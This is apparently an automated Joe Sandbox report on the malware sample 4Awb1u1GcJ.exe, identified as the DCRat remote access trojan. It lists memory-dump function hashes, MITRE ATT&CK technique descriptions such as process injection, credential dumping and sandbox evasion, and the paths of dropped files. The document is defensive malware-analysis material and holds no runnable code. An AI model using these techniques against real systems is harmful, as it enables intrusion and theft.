Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9baf1000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6de76e98bfc6effa27694d879d575623d5bf65b529cc66cf6e91837595c99546
Instruction ID: 43d128860ed8604e9ad4be91bc5dac81df90b897bf7d56c53582ac99310ca043
Opcode Fuzzy Hash: 6de76e98bfc6effa27694d879d575623d5bf65b529cc66cf6e91837595c99546
Instruction Fuzzy Hash: C3F0EC41F1F7894FD37963B958270D8BE50AF55224F8602FBD4488B1E7FC4D19454346

Function 00007FFD9BAEE7F9 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2922466285.00007FFD9BAE3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9bae3000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38f4d62d1697f20854600d01e7ab7dd152c6d6caaa18702fb035e89f6879b93f
Instruction ID: 476855af71e1dccef68bc56dbcf219663d0ee91adf697f43a9acbd1327112160
Opcode Fuzzy Hash: 38f4d62d1697f20854600d01e7ab7dd152c6d6caaa18702fb035e89f6879b93f
Instruction Fuzzy Hash: 8DE0D17164E3C44FC716D63544644547F60DF6720174642FEC045CF1A7EA2DCC45C701

Function 00007FFD9BAF20C9 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2922466285.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9baf1000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 094541c6e78c1aee5a8d80ff2d527c8ff0ba56e995755e85bc8351faddbbc7ca
Instruction ID: 87c2f9b6afaec22772851d15bc7a18f77d5472cdaae8686e4e0c243db08e3149
Opcode Fuzzy Hash: 094541c6e78c1aee5a8d80ff2d527c8ff0ba56e995755e85bc8351faddbbc7ca
Instruction Fuzzy Hash: 77E0127164E3C44FCB56EA748868455BF60EF6B21174A51FFC146CF2A7EA2DC885C702

Function 00007FFD9BAF7E69 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2922466285.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9baf1000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f50641ad5d5213aa2dc17994a1267e7611ceef9ee6b48011da30b1ee07c9cfe3
Instruction ID: 110eb73f5230145987757b26ecd1e5890d236428fbfac170b6385eb7b5049837
Opcode Fuzzy Hash: f50641ad5d5213aa2dc17994a1267e7611ceef9ee6b48011da30b1ee07c9cfe3
Instruction Fuzzy Hash: C1E01A2194B7C04FCB4A9B3588A88843F61EE2721074A51EAC045CF5A3EA199C4AC711

Function 00007FFD9BAF7EB5 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2922466285.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9baf1000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae81d5ac95bd8c5fff8a6cd2c358f58440a4ece3e35b295da8582a4b7a9ac074
Instruction ID: 28a022ecbd3b9009b87395c4a6365e2830f82562281417dd7367123ff57e88a7
Opcode Fuzzy Hash: ae81d5ac95bd8c5fff8a6cd2c358f58440a4ece3e35b295da8582a4b7a9ac074
Instruction Fuzzy Hash: A8E0C222B0BA480FD70D573C8C798A03BA1DF6621274A00A7D089CB1B2D859DD498302

Function 00007FFD9BAEE33B Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2922466285.00007FFD9BAE3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9bae3000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23e919f38f62065634f9b3ccd29254ec87a529ff3c646e2ad8171b17ed06a9dc
Instruction ID: 83dbf43ee27e2f0bb64188761776b2e75f704dbd0c5474e8c09a1c26dd919bee
Opcode Fuzzy Hash: 23e919f38f62065634f9b3ccd29254ec87a529ff3c646e2ad8171b17ed06a9dc
Instruction Fuzzy Hash: 4FD05E7370E90A4EE2E8C68CB4911B4A390E78427071505BAC05986155E94529828280

Function 00007FFD9BAE9899 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2922466285.00007FFD9BAE3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9bae3000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70852d346cfc9409396507736e4e6b4544e33bc06361bc9cc1858a06b1f6d553
Instruction ID: 1db58522da9de28e31cb779523eca4450abcbc688fb1d0a4992b89d381cd01c1
Opcode Fuzzy Hash: 70852d346cfc9409396507736e4e6b4544e33bc06361bc9cc1858a06b1f6d553
Instruction Fuzzy Hash: 49E01A6154E3C44FCB1AEB7488A58843F609E6B21078B40EEC145CF1B3E62DC949C701

Function 00007FFD9BAF86F9 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2922466285.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9baf1000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17cc3007005bdfc97938a42c10da641d179b57daf0060c172ca1985a0eb974ac
Instruction ID: dab32871cbc85d285961d3f55eb18337e92ec17c4cb0bcbe07d8ac8c1abaa0f6
Opcode Fuzzy Hash: 17cc3007005bdfc97938a42c10da641d179b57daf0060c172ca1985a0eb974ac
Instruction Fuzzy Hash: 2BE04F7154F3C44FCB16EB7488A98447FA0DE6B21078B40EEC145CF1B3E62D8849C701

Function 00007FFD9BAFA9F0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2922466285.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9baf1000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FFD9BAFA960 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2922466285.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9baf1000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FFD9BAF2159 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2922466285.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9baf1000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da128f81fa9ba5486a31de0cd4e5f8a12c3f0b511dd479f7270b98597e0de43d
Instruction ID: 93fc7443ac9194688500935f33d95dfb9dd491761466833b044a9748560a7b2b
Opcode Fuzzy Hash: da128f81fa9ba5486a31de0cd4e5f8a12c3f0b511dd479f7270b98597e0de43d
Instruction Fuzzy Hash: 8AE01A6154E3C08FCB06EB7888699453F609E6721178B41EEC48ACF1B3E62D8949C711

Function 00007FFD9BAFDA09 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2922466285.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9baf1000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff44dba98020fef4b3c3e64df86fcd324d1043a0d4e2cb8fcb8aaeae2f89a0e1
Instruction ID: 330eb2066f548c51af66d6f2d6e6aeca2d66f4fc219110031a576cb94dfd42b0
Opcode Fuzzy Hash: ff44dba98020fef4b3c3e64df86fcd324d1043a0d4e2cb8fcb8aaeae2f89a0e1
Instruction Fuzzy Hash: 02E0462194E7C44FC70B9B3088A88943F609E2B21078A80EFC185CF2B3EA298849C702

Function 00007FFD9BAFD989 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2922466285.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9baf1000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2481b657a33b3a0e3b5281c46e9dac1b8c54ae924db904c62a13a1d9ec9aa4e
Instruction ID: f00c18b47c7276171907e36da2352b4ff9c298c84fa6a9b301b23b1f5ee2ea31
Opcode Fuzzy Hash: d2481b657a33b3a0e3b5281c46e9dac1b8c54ae924db904c62a13a1d9ec9aa4e
Instruction Fuzzy Hash: 82E01A2194F7C04FC70B9B7488A99457F60DE1721074A41EBC085CF5B3E9298849C712

Function 00007FFD9BAC3C50 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2922466285.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9bac0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b71154f6811b1a46ea1c637581da84ea4721a7384894732eb20529ecdb6f447d
Instruction ID: 9e2d678ae3bc11ef4aaf512708dd09d8821d60d1399920d84545f3f6770f2a40
Opcode Fuzzy Hash: b71154f6811b1a46ea1c637581da84ea4721a7384894732eb20529ecdb6f447d
Instruction Fuzzy Hash: 61E01221F0911E4BFB74BB94C8603BA6191AF94300F220075D50DA33E2DDB86E418B44

Function 00007FFD9BAF2170 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2922466285.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9baf1000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Function 00007FFD9BAFBC08 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2922466285.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9baf1000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da2cb6c2cafa6b5f5edab449d0f7cf26ebb55178732f044562998e539d326a31
Instruction ID: beca89c9877ab166b887ea78a1c9346153e925e2969a7b3d387791861565c848
Opcode Fuzzy Hash: da2cb6c2cafa6b5f5edab449d0f7cf26ebb55178732f044562998e539d326a31
Instruction Fuzzy Hash: 73D02230B509040FC70CBB3888988743390EB6A2027C100A8D00ACB2B5D96ADC88C741

Function 00007FFD9BAF73E8 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2922466285.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9baf1000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6efcf4d848245db48568154ff59c781e8c6f4a461d009a097b4ab01ece28690
Instruction ID: 9aa36b5364ec0fbb0536188f23855feb88e95181f8f88ca35add344dd82d751f
Opcode Fuzzy Hash: d6efcf4d848245db48568154ff59c781e8c6f4a461d009a097b4ab01ece28690
Instruction Fuzzy Hash: D5D01234B519044FC71CA738C8998747792EB6A21679540A9D00AC72B1D96ADD89CB41

Function 00007FFD9BAD4EAB Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2922466285.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9bad0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 695cd6d037c7fdd18f4dad062843dc6fc43e3be44e1d5119e0169c718fa4a6fc
Instruction ID: ca75b0860f93c3d1ff2ed676c4811746299b92499ee5e6a7d3179e740e92256f
Opcode Fuzzy Hash: 695cd6d037c7fdd18f4dad062843dc6fc43e3be44e1d5119e0169c718fa4a6fc
Instruction Fuzzy Hash: A9D01731A1D50E8AFA68FB9894A02B96260AF84304F12057CD81E831A7CE686F028681

Function 00007FFD9BAC06A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2922466285.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9bac0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97a2d7dcafa2939c2f895590cec35bdfa7002fe09993c838be268cc9ca0f9451
Instruction ID: 367f34ee4ede4f3344eae2c8e7aa65f484e28e883d594cffae12e6f4d9fb499f
Opcode Fuzzy Hash: 97a2d7dcafa2939c2f895590cec35bdfa7002fe09993c838be268cc9ca0f9451
Instruction Fuzzy Hash: 60C04C45F5B51F01F83577EE54660BCB1405BD5A10FD70172D55D820F19CDE23D5015E

Function 00007FFD9BAC05D5 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2922466285.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9bac0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 530b2e4cba479226e548c664b9f99a967a9c48153231c63fb52f0da919f78608
Instruction ID: adaa22a799d21af13dea230c5cc1e8417e2cb901a935a44e57247e3c1ac49936
Opcode Fuzzy Hash: 530b2e4cba479226e548c664b9f99a967a9c48153231c63fb52f0da919f78608
Instruction Fuzzy Hash: EEB09238E9BA0E81DA3937B58C620787150AF45205FE602B5D409811A5E8EE56E64242

Function 00007FFD9BAC06C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2922466285.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9bac0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bee5cc9e94fd31349c2e8f327b20a06cbde244c229506f29f4827323b7dc03b
Instruction ID: 4d052e2a63690639fcd871327d287b8e23216d10027c160b1f9aa2018b2b5ba7
Opcode Fuzzy Hash: 6bee5cc9e94fd31349c2e8f327b20a06cbde244c229506f29f4827323b7dc03b
Instruction Fuzzy Hash: BFB01244D5740F01E83433FB089207870405B44100FC301B0D40D820A198CE13D40246

Non-executed Functions

Function 00007FFD9BAC09B0 Relevance: 5.2, Strings: 4, Instructions: 189COMMON

Download Yara Rule

Strings

c9, xrefs: 00007FFD9BAC0B56
#{9, xrefs: 00007FFD9BAC0B3E
!k9, xrefs: 00007FFD9BAC0B4E
"s9, xrefs: 00007FFD9BAC0B46

Memory Dump Source

Source File: 00000037.00000002.2922466285.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9bac0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: c9c3c36f248e70fe532d8adb05ba6551bac3cd8e2eb372142f076904cc2f9895
Instruction ID: 30253344944cce8f34e13f3fb5f163a769e7e5ec9a4bf3de2dd3f1cfb8273698
Opcode Fuzzy Hash: c9c3c36f248e70fe532d8adb05ba6551bac3cd8e2eb372142f076904cc2f9895
Instruction Fuzzy Hash: 75516E06B0A46A45E33977FD78219FD6B449FA923FB0843B7F85E8E0C74D486085C2E9

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 4Awb1u1GcJ.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Windows Mail\33ddca35e40cf7

C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe:Zone.Identifier

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\Recovery\33ddca35e40cf7

C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe

